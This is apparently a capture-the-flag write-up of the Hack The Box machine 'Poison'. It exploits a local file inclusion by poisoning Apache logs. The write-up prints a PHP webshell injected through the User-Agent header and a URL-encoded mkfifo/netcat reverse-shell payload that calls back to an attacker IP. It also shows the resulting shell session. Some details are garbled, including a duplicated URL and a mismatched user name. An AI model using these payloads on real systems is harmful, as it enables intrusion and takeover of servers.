Log Poisoning
lfi can leads to many exploitation techniques to gain a foothold on a target system.
since the web server is using apache, i will be conducting log poisoning
The target system is FreeBSD.
a quick google search reveals that the Apache log files for FreeBSD is located at the following by default:
/var/log/httpd-access.logfor access/var/log/httpd-error.logfor error
I can check this.
The access log.
The error log
It’s confirmed
Injecting Poison
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ curl http://$IP/ -A '<?php system($_GET['cmd']); ?>'I will just put a PHP webshell into the User-Agent header
It would look like this on Burp Suite
Because of LFI, that PHP webshell will be executed
As shown above, I have code execution
All I need to do now, is calling a reverse shell
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ curl 'http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=view-source:http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=mkfifo%20%2Ftmp%2Fbkjtjz%3B%20nc%2010.10.14.10%209999%200%3C%2Ftmp%2Fbkjtjz%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fbkjtjz%202%3E%261%3B%20rm%20%2Ftmp%2Fbkjtjz'Sending the payload via curl
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.84] 52363
whoami
www
hostname
Poison
ifconfig
le0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=8<VLAN_MTU>
ether 00:50:56:b9:ae:36
hwaddr 00:50:56:b9:ae:36
inet 10.10.10.84 netmask 0xffffff00 broadcast 10.10.10.255
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
media: Ethernet autoselect
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
options=600003<RXCSUM,TXCSUM,RXCSUM_IPV6,TXCSUM_IPV6>
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
inet 127.0.0.1 netmask 0xff000000
nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
groups: lo Initial Foothold established to the target system as www-data via log poisoning